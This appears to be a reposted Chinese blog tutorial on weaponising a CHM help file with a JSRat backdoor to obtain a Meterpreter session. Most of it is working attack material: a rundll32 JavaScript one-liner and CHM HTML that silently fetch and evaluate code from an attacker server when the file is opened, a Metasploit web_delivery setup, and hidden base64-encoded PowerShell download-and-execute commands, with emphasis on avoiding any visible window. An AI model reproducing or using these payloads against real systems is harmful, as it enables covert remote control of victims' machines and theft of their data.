• CHM + JSBackdoor捆绑后门


    使用交互模式的JSRat server:

    #!bash
    python MyJSRat.py -i 192.168.1.101 -p 8080
    

    Alt text

    访问 http://192.168.1.101:8080/wtf 获取攻击代码如下:

    #!bash
    rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
    

    经过多次测试,成功将以上命令写入chm,其Html代码为:

    #!html
    <!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
    This is a demo ! <br>
    <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
    <PARAM name="Command" value="ShortCut">
     <PARAM name="Button" value="Bitmap::shortcut">
     <PARAM name="Item1" value=',rundll32.exe,javascript:"..mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'>
     <PARAM name="Item2" value="273,1,1">
    </OBJECT>
    <SCRIPT>
    x.Click();
    </SCRIPT>
    </body></html>
    

    编译以后运行,可以成功获取JS交互shell:

    Alt text

    直接执行cmd /c command 是会有黑框的,可以使用run来避免显示黑框。执行run以后,输入 whoami > e:1.txt 之后通过read 来获取回显。

    2、获取meterpreter会话

    此次测试获取meterpreter会话的方式是通过执行powershell命令,直接获取,当获取客户端JS 交互shell之后自动执行powershell命令,获取meterpreter会话。具体操作如下:

    开启MSF web_delivery:

    #!bash
     ~  msfconsole -Lq
    msf > use exploit/multi/script/web_delivery
    msf exploit(web_delivery) > set target 2
    target => 2
    msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(web_delivery) > set lhost 192.168.1.101
    lhost => 192.168.1.101
    msf exploit(web_delivery) > set lport 6666
    lport => 6666
    msf exploit(web_delivery) > set SRVPORT 8081
    SRVPORT => 8081
    msf exploit(web_delivery) > set uripath /
    uripath => /
    msf exploit(web_delivery) > exploit
    [*] Exploit running as background job.
    msf exploit(web_delivery) >
    [*] Started reverse TCP handler on 192.168.1.101:6666
    [*] Using URL: http://0.0.0.0:8081/
    [*] Local IP: http://192.168.1.101:8081/
    [*] Server started.
    [*] Run the following command on the target machine:
    powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');
    

    装有powershell的客户端执行以下命令则可获取meterpreter会话:

    #!bash
    powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');
    

    由于存在特殊字符,我们可以把以上代码编码为base64格式,将以下代码存入power.txt

    #!bash
    $n=new-object net.webclient;
    $n.proxy=[Net.WebRequest]::GetSystemWebProxy();
    $n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;
    IEX $n.downloadstring('http://192.168.1.101:8081/');
    

    执行以下命令:

    #!bash
    cat power.txt | iconv --to-code UTF-16LE |base64
    

    Alt text

    最终要执行的powershell命令为:

    #!bash
    powershell -ep bypass -enc IAAkAG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAIAAkAG4ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsACgAgACQAbgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoAIABJAEUAWAAgACQAbgAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAxADoAOAAwADgAMQAvACcAKQA7AA==
    

    使用执行命令模式直接获取meterpreter会话:

    #!bash
    python MyJSRat.py -i 192.168.1.101 -p 8080 -c "powershell -ep bypass -enc IAAkAG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAIAAkAG4ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsACgAgACQAbgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoAIABJAEUAWAAgACQAbgAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAxADoAOAAwADgAMQAvACcAKQA7AA=="
    

    测试过程中,从运行CHM到获取meterpreter,客户端无明显异常,全程无黑框弹出,获取到meterpreter会话如下图:

    Alt text

    目前我还没查到什么防御的姿势,知道的小伙伴可以分享一下。最好就是提高个人安全意识,对于这类文件,多注意一下,尽量别乱点,如果非要点,可以放到虚拟机里面。使用procexp.exe可以看到存在后门的chm文件会开启新的进程。

  • 相关阅读:
    20130118
    延迟加载、分页显示等功能的增加
    ==和Equals的区别
    20160115--Hibernate
    20160108--搜索查询
    20150105
    20151229--数据表格
    20151226--easyUI
    DreamWeaver使用技巧(转)
    20121109
  • 原文地址:https://www.cnblogs.com/journeyIT/p/8260124.html
Copyright © 2020-2023  润新知